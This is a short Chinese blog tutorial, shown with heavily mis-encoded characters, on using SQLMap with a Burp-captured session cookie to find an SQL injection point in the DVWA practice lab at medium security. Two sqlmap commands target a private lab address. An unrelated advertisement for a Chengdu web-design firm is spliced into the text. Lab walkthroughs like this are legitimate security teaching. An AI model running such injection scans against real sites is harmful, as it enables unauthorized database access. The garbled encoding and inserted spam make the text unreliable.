下面我們嘗試?yán)肧QLMap進(jìn)行medium級(jí)別下的注入。

網(wǎng)站的建設(shè)成都創(chuàng)新互聯(lián)專注網(wǎng)站定制,經(jīng)驗(yàn)豐富,不做模板,主營網(wǎng)站定制開發(fā).小程序定制開發(fā),H5頁面制作!給你煥然一新的設(shè)計(jì)體驗(yàn)!已為雨棚定制等企業(yè)提供專業(yè)服務(wù)。

首先探測(cè)是否存在注入點(diǎn)，執(zhí)行下面的命令：

sqlmap.py -u http://192.168.80.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit

檢測(cè)結(jié)果沒有發(fā)現(xiàn)注入點(diǎn)，這是由于DVWA需要先登錄然后才能使用，因而這里需要得到當(dāng)前會(huì)話的cookie，用來在***過程中維持連接狀態(tài)。利用Burpsuite攔截?cái)?shù)據(jù)包，獲取cookie。

在SQLMap中加--cookie參數(shù)，繼續(xù)進(jìn)行注入。

sqlmap.py -u "http://192.168.80.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=medium; PHPSESSID=2f120ee00f32798d11de936832312549"

這下成功探測(cè)到注入點(diǎn)。

關(guān)于sqlmap和Burpsuite以后會(huì)另行發(fā)個(gè)系列博文。